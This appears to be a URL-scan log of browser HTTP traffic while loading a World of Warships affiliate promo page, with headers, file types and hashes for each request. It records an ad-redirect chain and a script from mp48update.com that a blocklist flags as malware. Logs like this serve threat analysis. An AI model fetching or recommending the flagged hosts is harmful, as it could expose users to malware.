                                        
                                            GET /glows-46780/src/video/background.jpg HTTP/1.1 
Host: promo-cdn.worldofwarships.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://promo.worldofwarships.eu/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

search
                                         92.223.97.97
HTTP/2 200 OK
content-type: image/jpeg
                                        
server: nginx
date: Fri, 09 Dec 2022 04:42:00 GMT
content-length: 1600607
last-modified: Thu, 17 Nov 2022 14:17:12 GMT
etag: "7ca3ab71bce37ba721e6df5793aec7db"
x-amz-request-id: tx0000000000000004dd560-00637642a2-1ce07b18-ed1
access-control-allow-origin: *
cache: HIT
x-cached-since: 2022-12-07T14:26:42+00:00
x-id: sto5-up-gc10
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  JPEG image data, JFIF standard 1.02, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=2, software=Adobe Photoshop 22.5 (20210825.orig.371 f9e5e2d) (Windows), datetime=2022:03:02 12:36:32], baseline, precision 8, 1920x1080, components 3\012- data
Size:   1600607
Md5:    7ca3ab71bce37ba721e6df5793aec7db
Sha1:   58d9843017d1de2e184947c3c245cd68993ed254
Sha256: 789b592e823e380c8c974b0dd2a5893b250ddb06d1e08f70ad3e19aca54b0cac
                                        
                                            GET /glows-46780/src/libs/jquery.fullpage.min.css HTTP/1.1 
Host: promo-cdn.worldofwarships.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://promo.worldofwarships.eu/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

search
                                         92.223.97.97
HTTP/2 200 OK
content-type: text/css; charset=utf-8
                                        
server: nginx
date: Fri, 09 Dec 2022 04:42:00 GMT
vary: Accept-Encoding
last-modified: Thu, 17 Nov 2022 14:17:12 GMT
etag: W/"5325456f69c244978fdc17e4a370d845"
x-amz-request-id: tx00000000000000075da31-00638f9090-1d272e0c-ed1
access-control-allow-origin: *
cache: HIT
x-cached-since: 2022-12-06T18:57:20+00:00
x-id: sto5-up-gc15
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   1694
Md5:    cffe90acf6062111a0c1ef91c16d4aaa
Sha1:   313cb0c39521094bb3d1b9f60cd2b8b62a202f31
Sha256: d4e7f69207f203af0cb4018cf13c2c99a48e9a3f2fabf59dea991e1da7414732
                                        
                                            GET /glows-46780/src/styles/style.css HTTP/1.1 
Host: promo-cdn.worldofwarships.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://promo.worldofwarships.eu/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

search
                                         92.223.97.97
HTTP/2 200 OK
content-type: text/css; charset=utf-8
                                        
server: nginx
date: Fri, 09 Dec 2022 04:42:00 GMT
vary: Accept-Encoding
last-modified: Thu, 17 Nov 2022 14:17:12 GMT
etag: W/"1b60b9684b13c04d6b5a1d0f84017275"
x-amz-request-id: tx000000000000001693fc0-00638f9090-1c2e427d-ed1
access-control-allow-origin: *
cache: HIT
x-cached-since: 2022-12-06T18:57:20+00:00
x-id: sto5-up-gc15
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   97449
Md5:    3fb70902154dedd6916905ad087f38d1
Sha1:   82064e2639852afb7c887a92a23a5556d193f292
Sha256: e7ed016cda61bebb1ffe00b787e5c51d1ebaf0bcd225700357e3eb6b58750fe9
                                        
                                            GET /glows-46780/src/fonts/robotocondensed-bold.woff HTTP/1.1 
Host: promo-cdn.worldofwarships.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: application/font-woff2;q=1.0,application/font-woff;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: identity
Origin: https://promo.worldofwarships.eu
Connection: keep-alive
Referer: https://promo-cdn.worldofwarships.com/
Sec-Fetch-Dest: font
Sec-Fetch-Mode: cors
Sec-Fetch-Site: cross-site
TE: trailers

search
                                         92.223.97.97
HTTP/2 200 OK
                                        
server: nginx
date: Fri, 09 Dec 2022 04:42:00 GMT
content-length: 92496
last-modified: Thu, 17 Nov 2022 14:17:12 GMT
etag: "fb69d9cc5aea733510b530ed221b75dc"
x-amz-request-id: tx000000000000000861a09-00637642a2-1cdc9228-ed1
access-control-allow-origin: *
cache: HIT
x-cached-since: 2022-12-07T14:26:41+00:00
x-id: sto5-up-gc10
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  Web Open Font Format, TrueType, length 92496, version 1.0\012- data
Size:   92496
Md5:    fb69d9cc5aea733510b530ed221b75dc
Sha1:   86276b2f2dfb7b42dc1639730c0bec56aa709be4
Sha256: 3b063cd5ae1793c617df8450a6c4343f7493ad006a574d9c3e9f7e81be9578f8
                                        
                                            POST / HTTP/1.1 
Host: ocsp.digicert.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         93.184.220.29
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Accept-Ranges: bytes
Age: 6193
Cache-Control: max-age=98439
Date: Fri, 09 Dec 2022 04:42:00 GMT
Etag: "639181ee-116"
Expires: Sat, 10 Dec 2022 08:02:39 GMT
Last-Modified: Thu, 08 Dec 2022 06:19:26 GMT
Server: ECS (ska/F6FE)
X-Cache: HIT
Content-Length: 278

                                        
                                            GET /glows-46780/src/libs/oneTrustBanner.js HTTP/1.1 
Host: promo-cdn.worldofwarships.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://promo.worldofwarships.eu/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

search
                                         92.223.97.97
HTTP/2 200 OK
content-type: text/javascript; charset=utf-8
                                        
server: nginx
date: Fri, 09 Dec 2022 04:42:00 GMT
last-modified: Thu, 17 Nov 2022 14:17:12 GMT
etag: W/"7ec3b6015c5487eb301fa7c905ea3f70"
x-amz-request-id: tx000000000000003ed6aae-00637642a1-1c8e9cf0-ed1
access-control-allow-origin: *
cache: HIT
x-cached-since: 2022-12-07T14:26:07+00:00
x-id: sto5-up-gc14
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text, with very long lines (835)
Size:   7075
Md5:    d5e4b1ca91206b7a8fd6d22b348ef4d4
Sha1:   6877a8819a3a0f77166ab46f8e0252a26e699c7f
Sha256: 1b30193583b6724a63de0af0a311a0682a9d48a67fb354387d28cef864c5ec47
                                        
                                            GET /glows-46780/eu-no/?t=1&pub_id=1287&xid=6392bc9709e8870001471b53&xid_param1=E0CDNGBJ6R&xid_param_2=&sid=SIDmA6uoEkq27UWF6r58VJAWfVUu4m5_oQd-9Zdso9495ceZERy_s4rHCVhEbT-DQrAE-cNC9XHqWgP7zV00rhUKg92F4wO48lsQWHe7tL3whPcmU361GEVVgbB9jeLK28hnNEyx-DMLfAHzA&enctid=cox0f7zg6w15&lpsn=WOWS+template1+new+animated+lp-v1&foris=1&teclient=1670560920082270349&utm_source=wlap&utm_medium=affiliate&utm_campaign=ujoxix0l&utm_content=1287 HTTP/1.1 
Host: promo.worldofwarships.eu
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

search
                                         92.223.97.97
HTTP/2 200 OK
content-type: text/html; charset=utf-8
                                        
server: nginx
date: Fri, 09 Dec 2022 04:42:00 GMT
vary: Accept-Encoding
last-modified: Thu, 17 Nov 2022 14:17:12 GMT
etag: W/"61b4af1bae2756b26cc69495654416d7"
x-amz-request-id: tx00000000000000084a3d4-00637a8aeb-1ce8cb68-ed1
cache: HIT
x-cached-since: 2022-12-07T10:20:37+00:00
x-id: sto5-up-gc10
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- HTML document text\012- exported SGML document text\012- exported SGML document, Unicode text, UTF-8 text, with very long lines (26078)
Size:   14405
Md5:    033f51e50cb36a064a82e0c82eb61eed
Sha1:   e4136e8d2113f89dc29891cc5e6aa2a52902e7db
Sha256: efd8ab252179035fcaf60d5c514eef46437d7642be19d2e44f216128661055a8
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         142.250.74.131
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 09 Dec 2022 04:42:00 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /glows-46780/src/libs/aos.css HTTP/1.1 
Host: promo-cdn.worldofwarships.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/css,*/*;q=0.1
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://promo.worldofwarships.eu/
Sec-Fetch-Dest: style
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

search
                                         92.223.97.97
HTTP/2 200 OK
content-type: text/css; charset=utf-8
                                        
server: nginx
date: Fri, 09 Dec 2022 04:42:00 GMT
vary: Accept-Encoding
last-modified: Thu, 17 Nov 2022 14:17:12 GMT
etag: W/"a6f0a9b1aea9999df9ed749e34d9430c"
x-amz-request-id: tx0000000000000017a56c0-00638f9090-1c2e4940-ed1
access-control-allow-origin: *
cache: HIT
x-cached-since: 2022-12-06T18:57:20+00:00
x-id: sto5-up-gc15
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   124701
Md5:    c1608b174e8c8c6d77a3f75833e91ba6
Sha1:   92907f7510d711097e8aa109c8d2b7f1d23fc5c0
Sha256: 230990df2de37c596aa71394ff64b510c98da3eaac660ae2926a02b2046dbd92
                                        
                                            GET /global_static/age_ratings/v2/pegi_ext-violence.svg HTTP/1.1 
Host: promo-cdn.worldofwarships.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://promo.worldofwarships.eu/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

search
                                         92.223.97.97
HTTP/2 200 OK
content-type: image/svg+xml
                                        
server: nginx
date: Fri, 09 Dec 2022 04:42:00 GMT
last-modified: Mon, 14 Feb 2022 22:01:20 GMT
etag: W/"9a3e2c35d77bd8b96138310eeb6b7f7b"
x-amz-request-id: tx00000000000000080ab06-00633fe0c3-1c4c0c09-ed1
access-control-allow-origin: *
cache: HIT
x-cached-since: 2022-12-06T08:22:20+00:00
x-id: sto5-up-gc11
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  SVG Scalable Vector Graphics image\012- , ASCII text, with very long lines (5875)
Size:   19387
Md5:    78722d4fded6af38f0e0c331d06fb5a3
Sha1:   4aa0fb1e1e69253a3c0a0562349f17779d1576bf
Sha256: e7cf1df6cd87517fc303c6034cec3f305c50a78edb328d4befb7161db65456b4
                                        
                                            GET /global_static/favicon/v2/apple-touch-icon-180x180.png HTTP/1.1 
Host: promo-cdn.worldofwarships.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://promo.worldofwarships.eu/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
TE: trailers

search
                                         92.223.97.97
HTTP/2 200 OK
content-type: image/png
                                        
server: nginx
date: Fri, 09 Dec 2022 04:42:00 GMT
content-length: 2326
last-modified: Mon, 05 Sep 2022 07:56:20 GMT
etag: "687168d21b7e78dfb6175de97ae3d045"
x-amz-request-id: tx0000000000000002a896d-00633fe0e6-1c4459fa-ed1
access-control-allow-origin: *
cache: HIT
x-cached-since: 2022-12-06T08:46:23+00:00
x-id: sto5-up-gc10
accept-ranges: bytes
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  PNG image data, 180 x 180, 8-bit/color RGBA, non-interlaced\012- data
Size:   2326
Md5:    687168d21b7e78dfb6175de97ae3d045
Sha1:   78081e22c1ea9e51a6cac8910d7ce01c319132e1
Sha256: 49f69cf7e37fda7051cd440048ecd5b2ab0973f106dc6e669959ee453b03e5d1
                                        
                                            GET /b.3gVG0fPw3fpLv/bymZVxJXZ_Dc0V0zNxThkzzWMqz/cl2ULDT/QN1_OeTwMazxNMzacn HTTP/1.1 
Host: thirawogla.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://long.interestmoments.com/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: cross-site

search
                                         88.85.94.246
HTTP/2 200 OK
content-type: text/html;charset=UTF-8
                                        
server: nginx
date: Fri, 09 Dec 2022 04:41:59 GMT
vary: Accept-Encoding
pragma: no-cache
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Bitness,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Mobile,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version,Sec-CH-UA-WoW64
expires: Mon, 26 Jul 2011 05:00:00 GMT
cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
last-modified: Fri, 09 Dec 2022 04:41:59 GMT
x-frame-options: DENY
referrer-policy: no-referrer
p3p: CP="CUR ADM OUR NOR STA NID"
set-cookie: kadCCap=199455:1:1668245056;222582:1:1669973958;79610:1:1669272875;221352:1:1670163762;132751:1:1669884292;219652:1:1669330335;222775:1:1670485741;212269:1:1667199062;219047:1:1667194435;220790:1:1668460505;218693:1:1669515516;220335:1:1670435916;223255:1:1670393482;222513:1:1670219541;218665:1:1670219511;215297:1:1669786163;221398:1:1670525489;219484:1:1667715065;194136:1:1669413157; max-age=1702096919; path=/ kadACap=458045:1:1670528140;446714:1:1669965428;346329:1:1670226206;451724:1:1669565807;445506:1:1669286676;419297:1:1670425925;346327:1:1670484781;446531:1:1669270846;419323:1:1669947125;407100:1:1668246232;445788:1:1669918420;451139:1:1669898733;190964:1:1669272875;419299:1:1669735589;450649:1:1670060949;445499:1:1670164226;419303:1:1670398063;442019:1:1670498208;419301:1:1670560919;383700:1:1670440962;410252:1:1670471005;449523:1:1670210030;419295:1:1670440857;446013:1:1668228435;419321:1:1670465503;272913:1:1670219562;419293:1:1669526430;424441:1:1670396486;444748:1:1669841678;445735:1:1669286676;419291:1:1670459724;401659:1:1670416416;458041:1:1670526590;453831:1:1670506915; max-age=1702096919; path=/ kadCSCap=222775:1:1670485741;221398:1:1670525489; path=/ kadASCap=346327:1:1670484781;458041:1:1670526590;458045:1:1670528140;419301:1:1670560919;453831:1:1670506915;442019:1:1670498208; path=/ kadRPixJ=bnVsbA==; max-age=1702096919; path=/ kadUnP3=CAEQl/nKnAYaDQjzwZkBEAEYrabGnAYaDQj2iP8BEAIY/uzInAYaDQiatZYCEAEY7a3GnAYaDQioiJcCEAEYi6nInAYaDQi4wZcCEAEYseTInAYaDQjgrZgCEAMYo9PHnAYiCggDEAoYrabGnAYqDAikkygQARiLqcicBioMCP+aKBABGLHkyJwGKgwIiqkoEAMYo9PHnAYqDAiMvRIQARitpsacBioMCLiOJRACGP7syJwGKgwI6IgoEAEY7a3GnAY=; max-age=1702096919; path=/
x-content-type-options: nosniff
content-encoding: br
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   1198
Md5:    de30b29e8bbc72b7828734d5d781b9eb
Sha1:   9d5fb51148291180b45d9481b756eb7fc2d4a352
Sha256: e47efd1c616db1a5564776f4be806183ee085c80d2d3722d3f8d5a06115e46ee
                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         142.250.74.131
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 09 Dec 2022 04:42:00 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /wp-content/plugins/live-news/public/assets/js/momentjs/momentjs.js?ver=2.10 HTTP/1.1 
Host: mp48update.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://mp48update.com/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: same-origin
TE: trailers

search
                                         64.90.37.168
HTTP/2 200 OK
content-type: application/javascript
                                        
date: Fri, 09 Dec 2022 04:41:57 GMT
server: Apache
vary: IS_SUBREQ,Accept-Encoding,User-Agent
last-modified: Thu, 18 Aug 2022 19:24:52 GMT
etag: "210f6-5e688ef8b04ad-gzip"
accept-ranges: bytes
cache-control: max-age=2592000
expires: Sun, 08 Jan 2023 04:41:57 GMT
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  data
Size:   34207
Md5:    84488b4fcb6a035beaa054e3e858825e
Sha1:   857843578d8692d8067eddff5a6195c9746e6939
Sha256: 85d6af250038bdfbae563bc3a8c7ff04354c144a8afcab3d8c25e3e96adc8b18

Alerts:
  Blocklists:
    - fortinet: Malware
                                        
                                            POST / HTTP/1.1 
Host: r3.o.lencr.org
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 85
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         23.36.76.226
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Server: nginx
Content-Length: 503
ETag: "2BF743556AA76E32A5C711BA897E4F0D211B4B8386F97E56A0984E691AE7CADE"
Last-Modified: Wed, 07 Dec 2022 17:00:00 UTC
Cache-Control: public, no-transform, must-revalidate, max-age=5918
Expires: Fri, 09 Dec 2022 06:20:38 GMT
Date: Fri, 09 Dec 2022 04:42:00 GMT
Connection: keep-alive

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 83
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         142.250.74.131
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 09 Dec 2022 04:42:00 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 471
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            POST /gts1c3 HTTP/1.1 
Host: ocsp.pki.goog
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/ocsp-request
Content-Length: 84
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

search
                                         142.250.74.131
HTTP/1.1 200 OK
Content-Type: application/ocsp-response
                                        
Date: Fri, 09 Dec 2022 04:42:00 GMT
Cache-Control: public, max-age=14400
Server: ocsp_responder
Content-Length: 472
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN

                                        
                                            GET /glows-46780/src/libs/jquery.min.js HTTP/1.1 
Host: promo-cdn.worldofwarships.com
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://promo.worldofwarships.eu/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

search
                                         92.223.97.97
HTTP/2 200 OK
content-type: text/javascript; charset=utf-8
                                        
server: nginx
date: Fri, 09 Dec 2022 04:42:00 GMT
last-modified: Thu, 17 Nov 2022 14:17:12 GMT
etag: W/"8c92b37b8bd194a02ac7fc497b72b27a"
x-amz-request-id: tx0000000000000008619ef-00637642a2-1cdc9228-ed1
access-control-allow-origin: *
cache: HIT
x-cached-since: 2022-12-07T14:26:07+00:00
x-id: sto5-up-gc13
content-encoding: gzip
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  ASCII text
Size:   58031
Md5:    bc0de04ec3c3f986d27ad882c9c32ae3
Sha1:   442ae6267608feef94cfd06b8c6f3f9628716ac6
Sha256: 665aad9ea09888c1d5d9573e5c347529f61b0d39e3de91611cd9ba7d41ce9586
                                        
                                            GET /pagead/viewthroughconversion/1006839708/?random=1670560919941&cv=11&fst=1670560919941&fmt=3&bg=ffffff&guid=ON&async=1&gtm=2wgbu0&gcs=G111&gcd=G111&u_w=1280&u_h=1024&label=H356CMb80IcDEJzPjOAD&hn=www.google.com&frm=0&url=https%3A%2F%2Fpromo.worldofwarships.eu%2Fglows-46780%2Feu-no%2F%3Ft%3D1%26pub_id%3D1287%26xid%3D6392bc9709e8870001471b53%26xid_param1%3DE0CDNGBJ6R%26xid_param_2%3D%26sid%3DSIDmA6uoEkq27UWF6r58VJAWfVUu4m5_oQd-9Zdso9495ceZERy_s4rHCVhEbT-DQrAE-cNC9XHqWgP7zV00rhUKg92F4wO48lsQWHe7tL3whPcmU361GEVVgbB9jeLK28hnNEyx-DMLfAHzA%26enctid%3Dcox0f7zg6w15%26lpsn%3DWOWS%2Btemplate1%2Bnew%2Banimated%2Blp-v1%26foris%3D1%26teclient%3D1670560920082270349%26utm_source%3Dwlap%26utm_medium%3Daffiliate%26utm_campaign%3Dujoxix0l%26utm_content%3D1287&tiba=World%C2%A0of%C2%A0Warships%E2%80%94massive%C2%A0naval%C2%A0clashes.%C2%A0Take%C2%A0command%C2%A0of%C2%A0legendary%C2%A0vessels%C2%A0from%C2%A0the%C2%A0early%C2%A020th%C2%A0century%C2%A0and%C2%A0fight%C2%A0for%C2%A0domination%C2%A0on%C2%A0the%C2%A0high&value=0&bttype=purchase&auid=1118582409.1670560920&data=ads_data_redaction%3Dtrue&gcp=1&ct_cookie_present=1 HTTP/1.1 
Host: googleads.g.doubleclick.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: image/avif,image/webp,*/*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://promo.worldofwarships.eu/
Sec-Fetch-Dest: image
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

search
                                         142.250.74.34
HTTP/2 200 OK
content-type: image/gif
                                        
p3p: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
date: Fri, 09 Dec 2022 04:42:00 GMT
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
cache-control: no-cache, must-revalidate
x-content-type-options: nosniff
server: cafe
content-length: 42
x-xss-protection: 0
set-cookie: test_cookie=CheckForPermission; expires=Fri, 09-Dec-2022 04:57:00 GMT; path=/; domain=.doubleclick.net; Secure; SameSite=none
alt-svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
X-Firefox-Spdy: h2


--- Additional Info ---
Magic:  GIF image data, version 89a, 1 x 1\012- data
Size:   42
Md5:    d89746888da2d9510b64a9f031eaecd5
Sha1:   d5fceb6532643d0d84ffe09c40c481ecdf59e15a
Sha256: ef1955ae757c8b966c83248350331bd3a30f658ced11f387f8ebf05ab3368629
                                        
                                            GET /pagead/viewthroughconversion/1006839708/?random=1670560919936&cv=11&fst=1670560919936&bg=ffffff&guid=ON&async=1&gtm=2wgbu0&u_w=1280&u_h=1024&hn=www.googleadservices.com&frm=0&url=https%3A%2F%2Fpromo.worldofwarships.eu%2Fglows-46780%2Feu-no%2F%3Ft%3D1%26pub_id%3D1287%26xid%3D6392bc9709e8870001471b53%26xid_param1%3DE0CDNGBJ6R%26xid_param_2%3D%26sid%3DSIDmA6uoEkq27UWF6r58VJAWfVUu4m5_oQd-9Zdso9495ceZERy_s4rHCVhEbT-DQrAE-cNC9XHqWgP7zV00rhUKg92F4wO48lsQWHe7tL3whPcmU361GEVVgbB9jeLK28hnNEyx-DMLfAHzA%26enctid%3Dcox0f7zg6w15%26lpsn%3DWOWS%2Btemplate1%2Bnew%2Banimated%2Blp-v1%26foris%3D1%26teclient%3D1670560920082270349%26utm_source%3Dwlap%26utm_medium%3Daffiliate%26utm_campaign%3Dujoxix0l%26utm_content%3D1287&tiba=World%C2%A0of%C2%A0Warships%E2%80%94massive%C2%A0naval%C2%A0clashes.%C2%A0Take%C2%A0command%C2%A0of%C2%A0legendary%C2%A0vessels%C2%A0from%C2%A0the%C2%A0early%C2%A020th%C2%A0century%C2%A0and%C2%A0fight%C2%A0for%C2%A0domination%C2%A0on%C2%A0the%C2%A0high&auid=1118582409.1670560920&rfmt=3&fmt=4 HTTP/1.1 
Host: googleads.g.doubleclick.net
                                        
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:105.0) Gecko/20100101 Firefox/105.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://promo.worldofwarships.eu/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site

search
                                         142.250.74.34
HTTP/2 200 OK
content-type: text/javascript; charset=UTF-8
                                        
p3p: policyref="https://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
timing-allow-origin: *
cross-origin-resource-policy: cross-origin
date: Fri, 09 Dec 2022 04:42:00 GMT
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
cache-control: no-cache, must-revalidate
x-content-type-options: nosniff
content-disposition: attachment; filename="f.txt"
content-encoding: br
server: cafe
content-length: 1286
x-xss-protection: 0
set-cookie: test_cookie=CheckForPermission; expires=Fri, 09-Dec-2022 04:57:00 GMT; path=/; domain=.doubleclick.net; Secure; SameSite=none
